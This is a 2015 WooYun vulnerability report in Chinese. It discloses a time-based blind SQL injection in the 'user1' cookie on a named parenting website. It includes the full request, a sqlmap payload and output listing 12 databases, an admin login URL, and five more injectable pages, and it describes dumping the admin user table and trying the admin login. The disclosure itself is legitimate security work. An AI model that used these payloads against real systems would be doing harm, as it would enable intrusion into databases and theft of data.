当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124148

漏洞标题:好孩子育儿网6处同一参数sql注入(12库)

相关厂商:好孩子育儿网

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-07-02 17:32

修复时间:2015-08-20 17:52

公开时间:2015-08-20 17:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-02: 细节已通知厂商并且等待厂商处理中
2015-07-06: 厂商已经确认,细节仅向厂商公开
2015-07-16: 细节向核心白帽子及相关领域专家公开
2015-07-26: 细节向普通白帽子公开
2015-08-05: 细节向实习白帽子公开
2015-08-20: 细节向公众公开

简要描述:

前天侄子在马路上看到一位老奶奶摔倒了,善良地扶了起来,我和路人也不禁感动了起来,老奶奶也没坑他,笑着摸了摸他的头,感谢了几句,这时候他的班主任走过,一脸鄙夷的看着我侄子。但是我想不通为什么?
第二天,校方在晨会上点名批评了他,指责:90后你们tm就是没责任心,就是不敢承担责任,社会的渣渣。(学校是初中和小学一起的)然后我侄子就哭着回来了。之后学校每个同学都不跟他讲话了,他也被调到了角落。
几天后那老奶奶的家人找到学校,那班主任还说:“某个同学,真没出息,责任都不知道担当,连个男人都不是。”那家人一进教室就说:“小同学终于找到你了,谢谢你扶我妈,太谢谢你了!”老师蒙了,同学也用一种微妙的眼光看他。后来那老奶奶家属向学校说了这件事,校方又在晨会上对这件事道歉。那班主任也对她进行了褒奖并在班会上道歉,可我总感觉侄子哪里有了些许变化······
后来有一天他看的一个男人的手机从裤子里滑了出来,他就淡淡的看了一眼,马上就走开了。我很郁闷他为什么不提醒那个人,结果他竟然直接转过头来说:“提醒什么,最后吃亏的是我,被误会的也是我,这世界上被误会的好人还少吗?反正以后我不想当好人了,你不知道那种孤立的感觉。”可怜的90后啊,他们并没有做错什么,可是是什么扭曲了他们的人生观。
当90后提醒别人别再车厢内吸烟的时候,被骂读书读傻了,当90后呼吁大家节约资源的时候,被骂多管闲事,当90后关注国家大事的时候,被骂无聊透顶。我们可想过错的究竟是90后还是这个社会?

详细说明:

说是6处也很牵强 因为都是cookie处的一个参数导致的注入 这里以找到的第一处为例进行注入测试 其他地方的将贴在漏洞修复处 以下为本次第一处注入的内容
post数据包:

GET / HTTP/1.1
Cookie: vary=1a47bc7a9c3ee744a941d73929eec501462d2cdb393871e888e164e3f4e89a95; s=6279ee6e56595fad7c927c26e4eb38ff; user1=1; LAST_URL=http%3A%2F%2Fwww.haohaizi.com%2Fmember-club.html; S[CART_COUNT]=0; S[CART_NUMBER]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00; LAST_URL=http%3A%2F%2Fwww.haohaizi.com%2Fmember-club.html; Hm_lvt_4c7ef74c5005ae3d162bbb46e1a5a502=1435813049,1435813050,1435813050; Hm_lpvt_4c7ef74c5005ae3d162bbb46e1a5a502=1435813050; Hm_lvt_53a0d71dba66835ff1aa907db99144d8=1435813050,1435813050; Hm_lpvt_53a0d71dba66835ff1aa907db99144d8=1435813050; BAIDUID=8CFA4412968D2DA53DA3FFCA8DA5D184:FG=1; _jzqa=1.2820335976352075300.1435813053.1435813053.1435813053.1; _jzqc=1; _jzqx=1.1435813053.1435813053.1.jzqsr=acunetix-referrer%2Ecom|jzqct=/javascript:domxssexecutionsink(0,"'\"><xsstag>()refdxss").-; _jzqckmp=1; _jzqb=1.2.10.1435813053.0; __utma=101467934.404633885.1435813139.1435813139.1435813139.1; __utmb=101467934.1.10.1435813139; __utmc=101467934; __utmz=101467934.1435813139.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); HMACCOUNT=36788650F438BF79; BAIDUID=8CFA4412968D2DA53DA3FFCA8DA5D184:FG=1; BAIDUID=8CFA4412968D2DA53DA3FFCA8DA5D184:FG=1
X-Requested-With: XMLHttpRequest
Referer: http://www.haohaizi.com:80/
Host: www.haohaizi.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


cookie 参数 user1 处可注入 (具体参数见下图以及漏洞证明处)

0.png


1.png


看了下 club 数据库 有 152张表 跑起来 太慢了 就没跑了

2.png


里面有个 club_admin_user 跑了下这个表

3.png


4.png


后台地址:http://club.haohaizi.com/admin/privilege.php?act=login
单独跑了下几个账号和密码 不正确的时候会提示 但是正确的时候没有提示 也没有跳转 还是登陆页面 不知道为什么 限制了IP??? 后面的就没继续测试了

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: Cookie #1* ((custom) HEADER)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: vary=1a47bc7a9c3ee744a941d73929eec501462d2cdb393871e888e164e3f4e89a
95; s=6279ee6e56595fad7c927c26e4eb38ff; user1=if(now()=sysdate(),sleep(0),0)/' A
ND (SELECT * FROM (SELECT(SLEEP(5)))blQv) AND 'UNxx'='UNxx'XOR(if(now()=sysdate(
),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/; LAST_URL=http://www.h
aohaizi.com/member-club.html; S[CART_COUNT]=0; S[CART_NUMBER]=0; S[CART_TOTAL_PR
ICE]=%EF%BF%A50.00; LAST_URL=http://www.haohaizi.com/member-club.html; Hm_lvt_4c
7ef74c5005ae3d162bbb46e1a5a502=1435813049,1435813050,1435813050; Hm_lpvt_4c7ef74
c5005ae3d162bbb46e1a5a502=1435813050; Hm_lvt_53a0d71dba66835ff1aa907db99144d8=14
35813050,1435813050; Hm_lpvt_53a0d71dba66835ff1aa907db99144d8=1435813050; BAIDUI
D=8CFA4412968D2DA53DA3FFCA8DA5D184:FG=1; _jzqa=1.2820335976352075300.1435813053.
1435813053.1435813053.1; _jzqc=1; _jzqx=1.1435813053.1435813053.1.jzqsr=acunetix
-referrer.com|jzqct=/javascript:domxssexecutionsink(0,"'\"><xsstag>()refdxss").-
; _jzqckmp=1; _jzqb=1.2.10.1435813053.0; __utma=101467934.404633885.1435813139.1
435813139.1435813139.1; __utmb=101467934.1.10.1435813139; __utmc=101467934; __ut
mz=101467934.1435813139.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcm
d=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); HM
ACCOUNT=36788650F438BF79; BAIDUID=8CFA4412968D2DA53DA3FFCA8DA5D184:FG=1; BAIDUID
=8CFA4412968D2DA53DA3FFCA8DA5D184:FG=1
---
[14:54:20] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[14:54:20] [INFO] fetching database names
[14:54:20] [INFO] fetching number of databases
[14:54:20] [INFO] resumed: 12
[14:54:20] [INFO] resumed: information_schema
[14:54:20] [INFO] resumed: binlogs
[14:54:20] [INFO] resumed: club
[14:54:20] [INFO] resumed: distribution
[14:54:20] [INFO] resumed: dms
[14:54:20] [INFO] resumed: mothershow
[14:54:20] [INFO] resumed: mysql\x03
[14:54:20] [INFO] resumed: performance_schema
[14:54:20] [INFO] resumed: stock
[14:54:20] [INFO] resumed: store
[14:54:20] [INFO] resumed: storehd
[14:54:20] [INFO] resumed: test\t
available databases [12]:
[*] `mysql`
[*] `test       `
[*] binlogs
[*] club
[*] distribution
[*] dms
[*] information_schema
[*] mothershow
[*] performance_schema
[*] stock
[*] store
[*] storehd
[14:54:20] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.haohaizi.com'
[*] shutting down at 14:54:20

修复方案:

另5处:
www.haohaizi.com/brand-16.html
www.haohaizi.com/brand-18.html
www.haohaizi.com/cart.html
www.haohaizi.com/member-club.html
www.haohaizi.com/search.html


都是 cookie 的 user1 参数注入 这里就不抓包演示了

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-06 17:51

厂商回复:

已修复

最新状态:

暂无